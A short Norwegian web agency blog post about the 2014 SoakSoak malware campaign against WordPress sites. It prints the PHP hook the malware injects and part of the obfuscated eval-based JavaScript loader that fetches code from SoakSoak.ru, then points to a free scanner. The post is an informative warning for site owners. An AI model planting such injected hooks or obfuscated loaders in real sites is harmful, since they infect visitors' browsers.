46664660 na@drweb.no
Vi har byttet navn tilFjordweb Solutions AS

Søndag 14 desember 2014 svartelister Google over 11,000 domener etter en rekke maleware angrep fra SoakSoak.ru.

Ifølge Sucuri er det snakk om over 100,000 WordPress sider som er rammet.

Det SoakSoak Malware gjør er og endre filen wp-includes/mal-loader.php med dette innholdet :

<?php
function FuncQueueObject()
{
  wp_enqueue_script("swfobject");
}
add_action("wp_enqueue_scripts", 'FuncQueueObject');

Dette gjør at wp-includes/js/swobject.js blir lastet inn på hver eneste side du ser på som inkluderer denne koden:

eval(decodeURIComponent 
("%28%0D%0A%66%75%6E%63%74%69%6F%6E%28%29%0D%0A%7B%0D%..72%69%
70%74%2E%69%64%3D%27%78%78%79%79%7A%7A%5F%70%65%74%75%73%68%6F%
6B%27%3B%0D%0A%09%68%65%61%64%2E%61%70%70%65%6E%64%43%68%69%6C%
64%28%73%63%72%69%70%74%29%3B%0D%0A%7D%28%29%0D%0A%29%3B"));

Når denne maleware koden blir dekodet vil den laste inn javascript maleware fra SoakSoak.ru.

Usikker på om din side er infisert? Da kan du bruke Sucuri sin gratis sjekk her: http://sitecheck.sucuri.net/